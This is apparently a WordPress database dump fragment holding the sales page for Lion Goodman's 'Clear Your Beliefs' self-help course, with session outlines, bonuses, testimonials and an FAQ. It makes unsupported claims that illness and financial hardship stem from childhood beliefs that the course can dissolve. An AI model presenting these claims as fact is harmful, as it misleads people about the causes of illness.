size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 19:21:42', '2014-12-12 00:21:42', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2005, 2, '2014-12-11 20:33:02', '2014-12-12 01:33:02', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause 